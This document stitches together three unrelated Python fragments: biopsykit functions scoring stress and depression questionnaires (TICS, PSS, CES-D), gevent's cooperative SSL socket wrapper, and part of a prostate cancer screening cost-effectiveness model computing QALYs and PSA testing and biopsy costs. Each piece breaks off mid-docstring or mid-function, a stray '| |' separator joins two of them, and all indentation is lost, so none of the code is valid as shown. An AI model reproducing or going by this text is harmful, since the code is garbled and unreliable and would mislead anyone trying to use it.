TICS_L score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something other than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
Examples
--------
>>> from biopsykit.questionnaires import tics_l
>>> # compute only a subset of subscales; questionnaire items additionally have custom indices
>>> subscales = {
>>> 'WorkOverload': [1, 2, 3],
>>> 'SocialOverload': [4, 5, 6],
>>> }
>>> tics_l_result = tics_l(data, subscales=subscales)
References
----------
<NAME>., <NAME>., & <NAME>. (2004). Trierer Inventar zum chronischen Stress: TICS. *Hogrefe*.
"""
score_name = "TICS_L"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 57)
subscales = {
"WorkOverload": [1, 4, 17, 27, 38, 44, 50, 54], # Arbeitsüberlastung
"SocialOverload": [7, 19, 28, 39, 49, 57], # Soziale Überlastung
"PressureToPerform": [8, 12, 14, 22, 23, 30, 32, 40, 43], # Erfolgsdruck
"WorkDiscontent": [5, 10, 13, 21, 37, 41, 48, 53], # Unzufriedenheit mit der Arbeit
"DemandsWork": [3, 20, 24, 35, 47, 55], # Überforderung bei der Arbeit
"LackSocialRec": [2, 18, 31, 46], # Mangel an sozialer Anerkennung
"SocialTension": [6, 15, 26, 33, 45, 52], # Soziale Spannungen
"SocialIsolation": [11, 29, 34, 42, 51, 56], # Soziale Isolation
"ChronicWorry": [9, 16, 25, 36], # Chronische Besorgnis
}
_assert_value_range(data, score_range)
tics_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 57:
# compute total score if all columns are present
tics_data[score_name] = data.sum(axis=1)
return pd.DataFrame(tics_data, index=data.index)
def tics_s(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
subscales: Optional[Dict[str, Sequence[Union[str, int]]]] = None,
) -> pd.DataFrame:
"""Compute the **Trier Inventory for Chronic Stress (Short Version) (TICS_S)**.
The TICS assesses frequency of various types of stressful experiences in the past 3 months.
It consists of the subscales (the name in the brackets indicate the name in the returned dataframe),
with the item indices (count-by-one, i.e., the first question has the index 1!):
* ``Work Overload``: [1, 3, 21]
* ``Social Overload``: [11, 18, 28]
* ``Excessive Demands at Work``: [12, 16, 27]
* ``Lack of Social Recognition``: [2, 20, 23]
* ``Work Discontent``: [8, 13, 24]
* ``Social Tension``: [4, 9, 26]
* ``Performance Pressure at Work``: [5, 14, 29]
* ``Performance Pressure in Social Interactions``: [6, 15, 22]
* ``Social Isolation``: [19, 25, 30]
* ``Worry Propensity``: [7, 10, 17]
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
.. warning::
Column indices in ``subscales`` are assumed to start at 1 (instead of 0) to avoid confusion with
questionnaire item columns, which typically also start with index 1!
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
TICS_S score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something other than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
Examples
--------
>>> from biopsykit.questionnaires import tics_s
>>> # compute only a subset of subscales; questionnaire items additionally have custom indices
>>> subscales = {
>>> 'WorkOverload': [1, 2, 3],
>>> 'SocialOverload': [4, 5, 6],
>>> }
>>> tics_s_result = tics_s(data, subscales=subscales)
References
----------
<NAME>., <NAME>., & <NAME>. (2004). Trierer Inventar zum chronischen Stress: TICS. *Hogrefe*.
"""
score_name = "TICS_S"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 30)
subscales = {
"WorkOverload": [1, 3, 21],
"SocialOverload": [11, 18, 28],
"PressureToPerform": [5, 14, 29],
"WorkDiscontent": [8, 13, 24],
"DemandsWork": [12, 16, 27],
"PressureSocial": [6, 15, 22],
"LackSocialRec": [2, 20, 23],
"SocialTension": [4, 9, 26],
"SocialIsolation": [19, 25, 30],
"ChronicWorry": [7, 10, 17],
}
_assert_value_range(data, score_range)
tics_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 30:
# compute total score if all columns are present
tics_data[score_name] = data.sum(axis=1)
return pd.DataFrame(tics_data, index=data.index)
def pss(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
subscales: Optional[Dict[str, Sequence[Union[str, int]]]] = None,
) -> pd.DataFrame:
"""Compute the **Perceived Stress Scale (PSS)**.
The PSS is a widely used self-report questionnaire with adequate reliability and validity asking
about how stressful a person has found his/her life during the previous month.
The PSS consists of the subscales with the item indices
(count-by-one, i.e., the first question has the index 1!):
* Perceived Helplessness (Hilflosigkeit - ``Helpless``): [1, 2, 3, 6, 9, 10]
* Perceived Self-Efficacy (Selbstwirksamkeit - ``SelfEff``): [4, 5, 7, 8]
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
PSS score
Raises
------
ValueError
if ``subscales`` is supplied and dict values are something other than a list of strings or a list of ints
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns do not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., & <NAME>. (1983). A Global Measure of Perceived Stress.
*Journal of Health and Social Behavior*, 24(4), 385. https://doi.org/10.2307/2136404
"""
score_name = "PSS"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
if subscales is None:
_assert_num_columns(data, 10)
subscales = {"Helpless": [1, 2, 3, 6, 9, 10], "SelfEff": [4, 5, 7, 8]}
_assert_value_range(data, score_range)
# Reverse scores 4, 5, 7, 8
data = invert(data, cols=to_idx([4, 5, 7, 8]), score_range=score_range)
pss_data = _compute_questionnaire_subscales(data, score_name, subscales)
pss_data["{}_Total".format(score_name)] = data.sum(axis=1)
return pd.DataFrame(pss_data, index=data.index)
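# Usage sketch for pss() (illustrative only; the column names below are hypothetical
# and the scores are assumed to already lie in the 0-4 range):
#
#     import pandas as pd
#     data = pd.DataFrame([[1, 2, 0, 3, 4, 1, 2, 3, 0, 1]],
#                         columns=["PSS_{}".format(i) for i in range(1, 11)])
#     scores = pss(data)   # expected to yield the Helpless and SelfEff subscales plus PSS_Total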
def cesd(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Center for Epidemiological Studies Depression Scale (CES-D)**.
The CES-D asks about depressive symptoms experienced over the past week.
Higher scores indicate greater depressive symptoms.
.. note::
This implementation assumes a score range of [0, 3].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are
# Source file: appengine/lib/gevent/_sslgte279.py (from the mrkevinlin/eighty repository)
# Wrapper module for _ssl. Written by <NAME>.
# Ported to gevent by <NAME>.
"""SSL wrapper for socket objects.
For the documentation, refer to :mod:`ssl` module manual.
This module implements cooperative SSL socket wrappers.
"""
from __future__ import absolute_import
import ssl as __ssl__
_ssl = __ssl__._ssl
import errno
from gevent.socket import socket, timeout_default
from gevent.socket import error as socket_error
from gevent.hub import PYPY
__implements__ = ['SSLContext',
'SSLSocket',
'wrap_socket',
'get_server_certificate',
'create_default_context',
'_create_unverified_context',
'_create_default_https_context',
'_create_stdlib_context']
__imports__ = []
# Import all symbols from Python's ssl.py, except those that we are implementing
# and "private" symbols.
for name in dir(__ssl__):
if name in __implements__:
continue
if name.startswith('__'):
continue
value = getattr(__ssl__, name)
globals()[name] = value
__imports__.append(name)
del name, value
__all__ = __implements__ + __imports__
orig_SSLContext = __ssl__.SSLContext
class SSLContext(orig_SSLContext):
def wrap_socket(self, sock, server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
server_hostname=None):
return SSLSocket(sock=sock, server_side=server_side,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
server_hostname=server_hostname,
_context=self)
def create_default_context(purpose=Purpose.SERVER_AUTH, cafile=None,
capath=None, cadata=None):
"""Create a SSLContext object with default settings.
NOTE: The protocol and settings may change anytime without prior
deprecation. The values represent a fair balance between maximum
compatibility and security.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(PROTOCOL_SSLv23)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
# disable compression to prevent CRIME attacks (OpenSSL 1.0+)
context.options |= getattr(_ssl, "OP_NO_COMPRESSION", 0)
if purpose == Purpose.SERVER_AUTH:
# verify certs and host name in client mode
context.verify_mode = CERT_REQUIRED
context.check_hostname = True
elif purpose == Purpose.CLIENT_AUTH:
# Prefer the server's ciphers by default so that we get stronger
# encryption
context.options |= getattr(_ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
# Use single use keys in order to improve forward secrecy
context.options |= getattr(_ssl, "OP_SINGLE_DH_USE", 0)
context.options |= getattr(_ssl, "OP_SINGLE_ECDH_USE", 0)
# disallow ciphers with known vulnerabilities
context.set_ciphers(_RESTRICTED_SERVER_CIPHERS)
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
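# Usage sketch (illustrative only; the host name and CA bundle path are hypothetical):
#
#     from gevent.socket import create_connection
#     ctx = create_default_context(cafile='/etc/ssl/certs/ca-certificates.crt')
#     raw = create_connection(('example.org', 443))
#     s = ctx.wrap_socket(raw, server_hostname='example.org')
#     s.sendall(b'GET / HTTP/1.0\r\nHost: example.org\r\n\r\n')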
def _create_unverified_context(protocol=PROTOCOL_SSLv23, cert_reqs=None,
check_hostname=False, purpose=Purpose.SERVER_AUTH,
certfile=None, keyfile=None,
cafile=None, capath=None, cadata=None):
"""Create a SSLContext object for Python stdlib modules
All Python stdlib modules shall use this function to create SSLContext
objects in order to keep common settings in one place. The configuration
is less restrict than create_default_context()'s to increase backward
compatibility.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(protocol)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
if cert_reqs is not None:
context.verify_mode = cert_reqs
context.check_hostname = check_hostname
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile or keyfile:
context.load_cert_chain(certfile, keyfile)
# load CA root certs
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
# Used by http.client if no context is explicitly passed.
_create_default_https_context = create_default_context
# Backwards compatibility alias, even though it's not a public name.
_create_stdlib_context = _create_unverified_context
class SSLSocket(socket):
def __init__(self, sock=None, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None,
suppress_ragged_eofs=True, npn_protocols=None, ciphers=None,
server_hostname=None,
_context=None):
self._makefile_refs = 0
if _context:
self._context = _context
else:
if server_side and not certfile:
raise ValueError("certfile must be specified for server-side "
"operations")
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile and not keyfile:
keyfile = certfile
self._context = SSLContext(ssl_version)
self._context.verify_mode = cert_reqs
if ca_certs:
self._context.load_verify_locations(ca_certs)
if certfile:
self._context.load_cert_chain(certfile, keyfile)
if npn_protocols:
self._context.set_npn_protocols(npn_protocols)
if ciphers:
self._context.set_ciphers(ciphers)
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
# Can't use sock.type as other flags (such as SOCK_NONBLOCK) get
# mixed in.
if sock.getsockopt(SOL_SOCKET, SO_TYPE) != SOCK_STREAM:
raise NotImplementedError("only stream sockets are supported")
socket.__init__(self, _sock=sock._sock)
# The initializer for socket overrides the methods send(), recv(), etc.
# in the instance, which we don't need -- but we want to provide the
# methods defined in SSLSocket.
for attr in _delegate_methods:
try:
delattr(self, attr)
except AttributeError:
pass
if server_side and server_hostname:
raise ValueError("server_hostname can only be specified "
"in client mode")
if self._context.check_hostname and not server_hostname:
raise ValueError("check_hostname requires server_hostname")
self.server_side = server_side
self.server_hostname = server_hostname
self.do_handshake_on_connect = do_handshake_on_connect
self.suppress_ragged_eofs = suppress_ragged_eofs
self.settimeout(sock.gettimeout())
# See if we are connected
try:
self.getpeername()
except socket_error as e:
if e.errno != errno.ENOTCONN:
raise
connected = False
else:
connected = True
self._closed = False
self._sslobj = None
self._connected = connected
if connected:
# create the SSL object
try:
self._sslobj = self._context._wrap_socket(self._sock, server_side,
server_hostname, ssl_sock=self)
if do_handshake_on_connect:
timeout = self.gettimeout()
if timeout == 0.0:
# non-blocking
raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
self.do_handshake()
except socket_error as x:
self.close()
raise x
@property
def context(self):
return self._context
@context.setter
def context(self, ctx):
self._context = ctx
self._sslobj.context = ctx
def dup(self):
raise NotImplementedError("Can't dup() %s instances" %
self.__class__.__name__)
def _checkClosed(self, msg=None):
# raise an exception here if you wish to check for spurious closes
pass
def _check_connected(self):
if not self._connected:
# getpeername() will raise ENOTCONN if the socket is really
# not connected; note that we can be connected even without
# _connected being set, e.g. if connect() first returned
# EAGAIN.
self.getpeername()
def read(self, len=0, buffer=None):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
while True:
try:
if buffer is not None:
return self._sslobj.read(len, buffer)
else:
return self._sslobj.read(len or 1024)
except SSLWantReadError:
if self.timeout == 0.0:
raise
self._wait(self._read_event, timeout_exc=_SSLErrorReadTimeout)
except SSLWantWriteError:
if self.timeout == 0.0:
raise
# note: using _SSLErrorReadTimeout rather than _SSLErrorWriteTimeout below is intentional
self._wait(self._write_event, timeout_exc=_SSLErrorReadTimeout)
except SSLError as ex:
if ex.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
if buffer is not None:
return 0
else:
return b''
else:
raise
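# Note on the retry loop above: SSLWantReadError / SSLWantWriteError mean the
# underlying non-blocking socket is not ready yet, so instead of busy-waiting the
# current greenlet parks on the hub's read/write event via self._wait() and the
# read is retried once the socket becomes readable/writable.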
def write(self, data):
"""Write DATA to the underlying SSL channel. Returns
number of bytes of DATA actually transmitted."""
while True:
try:
return self._sslobj.write(data)
except SSLError as ex:
if ex.args[0] == SSL_ERROR_WANT_READ:
if self.timeout == 0.0:
raise
self._wait(self._read_event, timeout_exc=_SSLErrorWriteTimeout)
elif ex.args[0] == SSL_ERROR_WANT_WRITE:
if self.timeout == 0.0:
raise
self._wait(self._write_event, timeout_exc=_SSLErrorWriteTimeout)
else:
raise
def getpeercert(self, binary_form=False):
"""Returns a formatted version of the data in the
certificate provided by the other end of the SSL channel.
Return None if no certificate was provided, {} if a
certificate was provided, but not validated."""
self._checkClosed()
self._check_connected()
return self._sslobj.peer_certificate(binary_form)
def selected_npn_protocol(self):
self._checkClosed()
if not self._sslobj or not _ssl.HAS_NPN:
return None
else:
return self._sslobj.selected_npn_protocol()
def cipher(self):
self._checkClosed()
if not self._sslobj:
return None
else:
return self._sslobj.cipher()
def compression(self):
self._checkClosed()
if not self._sslobj:
return None
else:
return self._sslobj.compression()
def send(self, data, flags=0, timeout=timeout_default):
self._checkClosed()
if timeout is timeout_default:
timeout = self.timeout
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to send() on %s" %
self.__class__)
while True:
try:
return self._sslobj.write(data)
except SSLWantReadError:
if self.timeout == 0.0:
return 0
self._wait(self._read_event)
except SSLWantWriteError:
if self.timeout == 0.0:
return 0
self._wait(self._write_event)
else:
return socket.send(self, data, flags, timeout)
def sendto(self, data, flags_or_addr, addr=None):
self._checkClosed()
if self._sslobj:
raise ValueError("sendto not allowed on instances of %s" %
self.__class__)
elif addr is None:
return socket.sendto(self, data, flags_or_addr)
else:
return socket.sendto(self, data, flags_or_addr, addr)
def sendmsg(self, *args, **kwargs):
# Ensure programs don't send data unencrypted if they try to
# use this method.
raise NotImplementedError("sendmsg not allowed on instances of %s" %
self.__class__)
def sendall(self, data, flags=0):
self._checkClosed()
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to sendall() on %s" %
self.__class__)
amount = len(data)
count = 0
while (count < amount):
v = self.send(data[count:])
count += v
return amount
else:
return socket.sendall(self, data, flags)
def recv(self, buflen=1024, flags=0):
self._checkClosed()
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv() on | |
t_deaths_pca_age = t_deaths_sc_pca_age + t_deaths_ns_pca_age
# Healthy life-years (screened arm)
lyrs_healthy_sc_nodiscount_age = (healthy_sc
- (0.5 * (healthy_death_other_sc+pca_incidence_sc)))
lyrs_healthy_sc_discount_age = lyrs_healthy_sc_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_sc_discount_age,
m_lyrs_healthy_sc_discount_age,
t_lyrs_healthy_sc_discount_age) = outcomes(lyrs_healthy_sc_discount_age)
# Healthy life-years (non-screened arm)
lyrs_healthy_ns_nodiscount_age = (healthy_ns
- (0.5 * (healthy_death_other_ns+pca_incidence_ns)))
lyrs_healthy_ns_discount_age = lyrs_healthy_ns_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_ns_discount_age,
m_lyrs_healthy_ns_discount_age,
t_lyrs_healthy_ns_discount_age) = outcomes(lyrs_healthy_ns_discount_age)
# Total healthy life-years
lyrs_healthy_nodiscount_age = lyrs_healthy_sc_nodiscount_age + lyrs_healthy_ns_nodiscount_age
(s_lyrs_healthy_nodiscount_age,
m_lyrs_healthy_nodiscount_age,
t_lyrs_healthy_nodiscount_age) = outcomes(lyrs_healthy_nodiscount_age)
lyrs_healthy_discount_age = lyrs_healthy_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_discount_age,
m_lyrs_healthy_discount_age,
t_lyrs_healthy_discount_age) = outcomes(lyrs_healthy_discount_age)
# Life-years with prostate cancer in screened arm
lyrs_pca_sc_discount = lyrs_pca_sc_nodiscount * discount_factor[:total_cycles]
(s_lyrs_pca_sc_discount_age,
m_lyrs_pca_sc_discount_age,
t_lyrs_pca_sc_discount_age) = outcomes(lyrs_pca_sc_discount)
# Life-years with prostate cancer in non-screened arm
lyrs_pca_ns_discount = lyrs_pca_ns_nodiscount * discount_factor[:total_cycles]
(s_lyrs_pca_ns_discount_age,
m_lyrs_pca_ns_discount_age,
t_lyrs_pca_ns_age) = outcomes(lyrs_pca_ns_discount)
# Life-years with prostate cancer in both arms
lyrs_pca_nodiscount_age = lyrs_pca_sc_nodiscount + lyrs_pca_ns_nodiscount
lyrs_pca_discount_age = lyrs_pca_sc_discount + lyrs_pca_ns_discount
(s_lyrs_pca_discount_age,
m_lyrs_pca_discount_age,
t_lyrs_pca_discount_age) = outcomes(lyrs_pca_discount_age)
# Total life-years
##################
lyrs_nodiscount_age = lyrs_healthy_nodiscount_age + lyrs_pca_nodiscount_age
(s_lyrs_nodiscount_age,
m_lyrs_nodiscount_age,
t_lyrs_nodiscount_age) = outcomes(lyrs_nodiscount_age)
lyrs_discount_age = lyrs_healthy_discount_age + lyrs_pca_discount_age
(s_lyrs_discount_age,
m_lyrs_discount_age,
t_lyrs_discount_age) = outcomes(lyrs_discount_age)
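# Illustration (not part of the model): each discounted quantity above is the
# undiscounted array multiplied element-wise by discount_factor (typically
# 1/(1+r)^t in health-economic models). A minimal NumPy sketch with a
# hypothetical 3.5% annual rate:
#
#     import numpy as np
#     r = 0.035                                            # assumed rate, illustration only
#     discount_factor = 1.0 / (1.0 + r) ** np.arange(total_cycles)
#     lyrs_discount_age = lyrs_nodiscount_age * discount_factor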
# QALYs (healthy life) - screened arm
qalys_healthy_sc_nodiscount_age = lyrs_healthy_sc_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_sc_discount_age = lyrs_healthy_sc_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_sc_discount_age,
m_qalys_healthy_sc_discount_age,
t_qalys_healthy_sc_discount_age) = outcomes(qalys_healthy_sc_discount_age)
# QALYs (healthy life) - non-screened arm
qalys_healthy_ns_nodiscount_age = lyrs_healthy_ns_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_ns_discount_age = lyrs_healthy_ns_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_ns_discount_age,
m_qalys_healthy_ns_discount_age,
t_qalys_healthy_ns_discount_age) = outcomes(qalys_healthy_ns_discount_age)
# Total QALYs (healthy life)
qalys_healthy_nodiscount_age = lyrs_healthy_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_discount_age = lyrs_healthy_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_discount_age,
m_qalys_healthy_discount_age,
t_qalys_healthy_discount_age) = outcomes(qalys_healthy_discount_age)
# QALYS with prostate cancer - screened arm
qalys_pca_sc_nodiscount_age = lyrs_pca_sc_nodiscount * pca_incidence_utility_psa[:,year-45:]
qalys_pca_sc_discount_age = lyrs_pca_sc_discount * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_sc_discount_age,
m_qalys_pca_sc_discount_age,
t_qalys_pca_sc_discount_age) = outcomes(qalys_pca_sc_discount_age)
# QALYS with prostate cancer - non-screened arm
qalys_pca_ns_nodiscount_age = lyrs_pca_ns_nodiscount * pca_incidence_utility_psa[:,year-45:]
qalys_pca_ns_discount_age = lyrs_pca_ns_discount * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_ns_discount_age,
m_qalys_pca_ns_discount_age,
t_qalys_pca_ns_discount_age) = outcomes(qalys_pca_ns_discount_age)
# Total QALYS with prostate cancer
qalys_pca_nodiscount_age = lyrs_pca_nodiscount_age * pca_incidence_utility_psa[:,year-45:]
qalys_pca_discount_age = lyrs_pca_discount_age * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_discount_age,
m_qalys_pca_discount_age,
t_qalys_pca_discount_age) = outcomes(qalys_pca_discount_age)
# Total QALYs
#############
qalys_nodiscount_age = qalys_healthy_nodiscount_age + qalys_pca_nodiscount_age
(s_qalys_nodiscount_age,
m_qalys_nodiscount_age,
t_qalys_nodiscount_age) = outcomes(qalys_nodiscount_age)
qalys_discount_age = qalys_healthy_discount_age + qalys_pca_discount_age
(s_qalys_discount_age,
m_qalys_discount_age,
t_qalys_discount_age) = outcomes(qalys_discount_age)
# Costs of PSA testing in non-screened arm
n_psa_tests_ns_age = ((pca_incidence_ns / p_suspected_ns[:,year-45:])
+ ((pca_incidence_ns * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])) * n_psa_tests[:,year-45:]
cost_psa_testing_ns_nodiscount_age = n_psa_tests_ns_age * cost_psa[:,year-45:] * relative_cost_clinically_detected[:,year-45:]
(s_cost_psa_testing_ns_nodiscount_age,
m_cost_psa_testing_ns_nodiscount_age,
t_cost_psa_testing_ns_nodiscount_age) = outcomes(cost_psa_testing_ns_nodiscount_age)
cost_psa_testing_ns_discount_age = cost_psa_testing_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_psa_testing_ns_discount_age,
m_cost_psa_testing_ns_discount_age,
t_cost_psa_testing_ns_discount_age) = outcomes(cost_psa_testing_ns_discount_age)
# Costs of PSA testing in screened arm (PSA screening every four years)
# PSA tests during screened and non-screened period
if year < 55:
# Assuming all cancers are clinically detected, as these cohorts
# are not eligible for screening (hence p_suspected_ns).
# This uses (1-uptake_biopsy) because the first part of the equation works out
# the number of biopsies, which is then multiplied by n_psa_tests to get the
# number of PSA tests.
n_psa_tests_sc_age = (((pca_incidence_sc / p_suspected_ns[:,year-45:])
+ ((pca_incidence_sc * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:]))
* uptake_psa
* n_psa_tests[:,year-45:])
cost_psa_testing_sc_nodiscount_age = (n_psa_tests_sc_age
* cost_psa[:,year-45:]
* relative_cost_clinically_detected[:,year-45:])
if year > 54:
# Get the screened years
lyrs_healthy_screened_nodiscount_age = np.array([np.zeros(length_df)] * sims)
lyrs_healthy_screened_nodiscount_age[:,:length_screen] = lyrs_healthy_sc_nodiscount_age[:,:length_screen].copy()
lyrs_healthy_screened_nodiscount_age[:,length_screen:] = 0
# Population-level PSA testing during screening phase
n_psa_tests_screened_age = lyrs_healthy_screened_nodiscount_age * uptake_psa / 4
# Assuming all cancers are clinically detected in the post-screening phase
n_psa_tests_post_screening_age = (((pca_incidence_post_screening / p_suspected_ns[:,year-45:])
+ ((pca_incidence_post_screening * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:]))
* uptake_psa
* n_psa_tests[:,year-45:])
# Total PSA tests
n_psa_tests_sc_age = (n_psa_tests_screened_age + n_psa_tests_post_screening_age)
cost_psa_testing_screened_age = n_psa_tests_screened_age * cost_psa[:,year-45:]
cost_psa_testing_post_screening_age = (n_psa_tests_post_screening_age
* cost_psa[:,year-45:]
* relative_cost_clinically_detected[:,year-45:])
cost_psa_testing_sc_nodiscount_age = (cost_psa_testing_screened_age
+ cost_psa_testing_post_screening_age)
(s_cost_psa_testing_sc_nodiscount_age,
m_cost_psa_testing_sc_nodiscount_age,
t_cost_psa_testing_sc_nodiscount_age) = outcomes(cost_psa_testing_sc_nodiscount_age)
cost_psa_testing_sc_discount_age = cost_psa_testing_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_psa_testing_sc_discount_age,
m_cost_psa_testing_sc_discount_age,
t_cost_psa_testing_sc_discount_age) = outcomes(cost_psa_testing_sc_discount_age)
# Total costs of PSA testing
############################
n_psa_tests_age = n_psa_tests_ns_age + n_psa_tests_sc_age
(s_n_psa_tests_age,
m_n_psa_tests_age,
total_n_psa_tests_age) = outcomes(n_psa_tests_age)
cost_psa_testing_nodiscount_age = cost_psa_testing_ns_nodiscount_age + cost_psa_testing_sc_nodiscount_age
(s_cost_psa_testing_nodiscount_age,
m_cost_psa_testing_nodiscount_age,
t_cost_psa_testing_nodiscount_age) = outcomes(cost_psa_testing_nodiscount_age)
cost_psa_testing_discount_age = cost_psa_testing_ns_discount_age + cost_psa_testing_sc_discount_age
(s_cost_psa_testing_discount_age,
m_cost_psa_testing_discount_age,
t_cost_psa_testing_discount_age) = outcomes(cost_psa_testing_discount_age)
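# Worked illustration of the PSA-test formula above (made-up numbers):
# with pca_incidence = 10, p_suspected = 0.25, uptake_biopsy = 0.8,
# p_suspected_refuse_biopsy = 0.5 and n_psa_tests = 1.2 per referral,
# (10/0.25 + 10*(1-0.8)/0.5) * 1.2 = (40 + 4) * 1.2 = 52.8 PSA tests.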
# Costs of biopsy - screened arm
if year < 55:
# Assuming all cancers are clinically detected as these cohorts
# are not eligible for screening (hence p_suspected_ns)
n_biopsies_sc_age = pca_incidence_sc / p_suspected_ns[:,year-45:]
# Costs include the costs of those who turn down biopsy
cost_biopsy_sc_nodiscount_age = (((pca_incidence_sc / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_sc * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
if year > 54:
# Screen-detected cancers
n_biopsies_screened_age = pca_incidence_screened / p_suspected[:,year-45:]
cost_biopsy_screened_nodiscount_age = (((pca_incidence_screened / p_suspected[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_screened * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy[:,year-45:])
* cost_refuse_biopsy[:,year-45:]))
# Assuming all cancers are clinically detected in the post-screening phase
